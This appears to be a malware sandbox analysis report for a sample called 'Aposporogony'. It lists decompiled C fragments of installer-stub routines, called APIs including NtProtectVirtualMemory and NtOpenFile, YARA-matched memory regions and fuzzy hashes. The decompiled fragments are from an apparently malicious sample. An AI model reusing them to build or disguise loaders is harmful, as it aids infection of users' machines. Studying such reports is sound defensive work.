                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040672B(WCHAR* _a4) {
                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 = FindFirstFileW(_a4, 0x426778); // executed
                                                                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				FindClose(_t2); // executed
                                                                                                                                                                                      				return 0x426778;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x00406736
                                                                                                                                                                                      0x0040673f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040674c
                                                                                                                                                                                      0x00406742
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0), ref: 00406736
                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00406742
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                      • String ID: xgB
                                                                                                                                                                                      • API String ID: 2295610775-399326502
                                                                                                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                                      			E00402104() {
                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                      				void* _t56;
                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                      				intOrPtr* _t62;
                                                                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                                                                      				intOrPtr* _t66;
                                                                                                                                                                                      				intOrPtr* _t68;
                                                                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                      				intOrPtr* _t74;
                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                      				intOrPtr* _t78;
                                                                                                                                                                                      				intOrPtr* _t80;
                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                      				intOrPtr* _t91;
                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                      				signed int _t105;
                                                                                                                                                                                      				void* _t107;
                                                                                                                                                                                      
                                                                                                                                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C41(0xfffffff0);
                                                                                                                                                                                      				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C41(0xffffffdf);
                                                                                                                                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402C41(2);
                                                                                                                                                                                      				 *((intOrPtr*)(_t107 - 0x48)) = E00402C41(0xffffffcd);
                                                                                                                                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402C41(0x45);
                                                                                                                                                                                      				_t52 =  *(_t107 - 0x18);
                                                                                                                                                                                      				 *(_t107 - 0x44) = _t52 & 0x00000fff;
                                                                                                                                                                                      				_t101 = _t52 & 0x00008000;
                                                                                                                                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                                                                                                      				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                      				if(E00405D34( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
                                                                                                                                                                                      					E00402C41(0x21);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t56 = _t107 + 8;
                                                                                                                                                                                      				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56); // executed
                                                                                                                                                                                      				if(_t56 < _t83) {
                                                                                                                                                                                      					L14:
                                                                                                                                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                                                                                                      					_push(0xfffffff0);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
                                                                                                                                                                                      					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
                                                                                                                                                                                      					if(_t61 >= _t83) {
                                                                                                                                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
                                                                                                                                                                                      						if(_t101 == _t83) {
                                                                                                                                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism\\Scups");
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t105 != _t83) {
                                                                                                                                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                                                                                                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x48));
                                                                                                                                                                                      						if( *_t91 != _t83) {
                                                                                                                                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                                                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                                                                                                      						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                                                                                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x30));
                                                                                                                                                                                      							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x30));
                                                                                                                                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                                                      					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
                                                                                                                                                                                      						_push(0xfffffff4);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E00401423();
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}






















                                                                                                                                                                                      0x0040210d
                                                                                                                                                                                      0x00402117
                                                                                                                                                                                      0x00402121
                                                                                                                                                                                      0x0040212b
                                                                                                                                                                                      0x00402136
                                                                                                                                                                                      0x00402139
                                                                                                                                                                                      0x00402153
                                                                                                                                                                                      0x00402156
                                                                                                                                                                                      0x0040215c
                                                                                                                                                                                      0x0040215f
                                                                                                                                                                                      0x00402169
                                                                                                                                                                                      0x0040216d
                                                                                                                                                                                      0x0040216d
                                                                                                                                                                                      0x00402172
                                                                                                                                                                                      0x00402183
                                                                                                                                                                                      0x0040218b
                                                                                                                                                                                      0x00402242
                                                                                                                                                                                      0x00402242
                                                                                                                                                                                      0x00402249
                                                                                                                                                                                      0x00402191
                                                                                                                                                                                      0x00402191
                                                                                                                                                                                      0x004021a0
                                                                                                                                                                                      0x004021a4
                                                                                                                                                                                      0x004021a7
                                                                                                                                                                                      0x004021ad
                                                                                                                                                                                      0x004021bb
                                                                                                                                                                                      0x004021be
                                                                                                                                                                                      0x004021c0
                                                                                                                                                                                      0x004021cb
                                                                                                                                                                                      0x004021cb
                                                                                                                                                                                      0x004021d0
                                                                                                                                                                                      0x004021d2
                                                                                                                                                                                      0x004021d9
                                                                                                                                                                                      0x004021d9
                                                                                                                                                                                      0x004021dc
                                                                                                                                                                                      0x004021e5
                                                                                                                                                                                      0x004021e8
                                                                                                                                                                                      0x004021ee
                                                                                                                                                                                      0x004021f0
                                                                                                                                                                                      0x004021fa
                                                                                                                                                                                      0x004021fa
                                                                                                                                                                                      0x004021fd
                                                                                                                                                                                      0x00402206
                                                                                                                                                                                      0x00402209
                                                                                                                                                                                      0x00402212
                                                                                                                                                                                      0x00402218
                                                                                                                                                                                      0x0040221a
                                                                                                                                                                                      0x00402228
                                                                                                                                                                                      0x00402228
                                                                                                                                                                                      0x0040222b
                                                                                                                                                                                      0x00402231
                                                                                                                                                                                      0x00402231
                                                                                                                                                                                      0x00402234
                                                                                                                                                                                      0x0040223a
                                                                                                                                                                                      0x00402240
                                                                                                                                                                                      0x00402255
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402240
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups, xrefs: 004021C3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups
                                                                                                                                                                                      • API String ID: 542301482-4164907853
                                                                                                                                                                                      • Opcode ID: 8753afcf6751bcdabc659c2b94f207215f5514083c8d68ac7d5b9eb83cdc66a3
                                                                                                                                                                                      • Instruction ID: e2e3704c815c40c35bbcee670b9089186c45407539ca1009a8039cbe375c7a13
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8753afcf6751bcdabc659c2b94f207215f5514083c8d68ac7d5b9eb83cdc66a3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +}=h
                                                                                                                                                                                      • API String ID: 0-601861620
                                                                                                                                                                                      • Opcode ID: d1af1e0afd7ec0ab2ba8e3faba51e52d8a18026d38c877ad87a8e1b8fba48299
                                                                                                                                                                                      • Instruction ID: 452a5d58d253af378c3c157b3d73fedfe6b81bf48eb42c0eaf567d96e6984148
                                                                                                                                                                                      • Opcode Fuzzy Hash: d1af1e0afd7ec0ab2ba8e3faba51e52d8a18026d38c877ad87a8e1b8fba48299
                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC1247460474A8FDF399E3889553DA7BB2EFA2380F94815ACC8A8F654D7344683CF05
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtOpenFile.NTDLL(00000001,034A6CA6,63F43251,00000000), ref: 034A64C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2669468079-0
                                                                                                                                                                                      • Opcode ID: 4af3598fa17207b03d2e233ba3bee9abeb8dfd9a0c38a2ad6cc3be89c025528a
                                                                                                                                                                                      • Instruction ID: 731879b4356d4b0ce74aa549688b8043d8f6d29e25e2c500ca0a0ab168714043
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4af3598fa17207b03d2e233ba3bee9abeb8dfd9a0c38a2ad6cc3be89c025528a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 70110471200608CFCB68CE2DC9A42ED73A5AFA6314F29412BD926CF754D738CD468B04
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 034A50BA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                                                      • Opcode ID: 939dc25c6e5fef4d33a2fc1bdaf6e8a55c01396605485a4c25080973e5a4ba84
                                                                                                                                                                                      • Instruction ID: 6531adcc32dc53e31b263003a2963d21293ca950bf5f0d4387b8677d785ae9df
                                                                                                                                                                                      • Opcode Fuzzy Hash: 939dc25c6e5fef4d33a2fc1bdaf6e8a55c01396605485a4c25080973e5a4ba84
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11016DB16082849FDB38DE5CCC086ED73E6AF98310F55841EEC998B304D6309E80CB56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E00402868(short __ebx, short* __esi) {
                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t8 = FindFirstFileW(E00402C41(2), _t21 - 0x2d4); // executed
                                                                                                                                                                                      				if(_t8 != 0xffffffff) {
                                                                                                                                                                                      					E0040632F( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                                                                                      					_push(_t21 - 0x2a8);
                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                      					E004063E8();
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                                                                                      					 *__esi = __ebx;
                                                                                                                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00402877
                                                                                                                                                                                      0x00402880
                                                                                                                                                                                      0x0040289b
                                                                                                                                                                                      0x004028a6
                                                                                                                                                                                      0x004028a7
                                                                                                                                                                                      0x004029e1
                                                                                                                                                                                      0x00402882
                                                                                                                                                                                      0x00402885
                                                                                                                                                                                      0x00402888
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                      • Opcode ID: 6bf8e3b6b836a8cf3f5983dce5067b6ca3407656ba03b7c7a81dd0939c3d72e5
                                                                                                                                                                                      • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bf8e3b6b836a8cf3f5983dce5067b6ca3407656ba03b7c7a81dd0939c3d72e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +}=h
                                                                                                                                                                                      • API String ID: 0-601861620
                                                                                                                                                                                      • Opcode ID: df1261a8bfee7e19fbc92bdcffaf1178d32e014d77565dd7061832bab7d140b9
                                                                                                                                                                                      • Instruction ID: 102e0774bebc31603d5ab0193fac2ce878950ba6d426cdde1d5df2d4f9c31ad2
                                                                                                                                                                                      • Opcode Fuzzy Hash: df1261a8bfee7e19fbc92bdcffaf1178d32e014d77565dd7061832bab7d140b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: E08148356047899FCF38EF2888547EE37A2EF91750FA5442EDC899F644D7304A82CB56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: +}=h
                                                                                                                                                                                      • API String ID: 0-601861620
                                                                                                                                                                                      • Opcode ID: 2c9e8f85ed51c06a067caf1fba14097734a17ca9d74077758396c63cbcb19811
                                                                                                                                                                                      • Instruction ID: 812d63fc7e2dbb558a7230f5308784bcd144e710c68acba1c0d83ab771758aa5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c9e8f85ed51c06a067caf1fba14097734a17ca9d74077758396c63cbcb19811
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41F4356047858FCF38AE2889543E937B2DFA0340F95841EDC8D9B655D7348A43CB52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
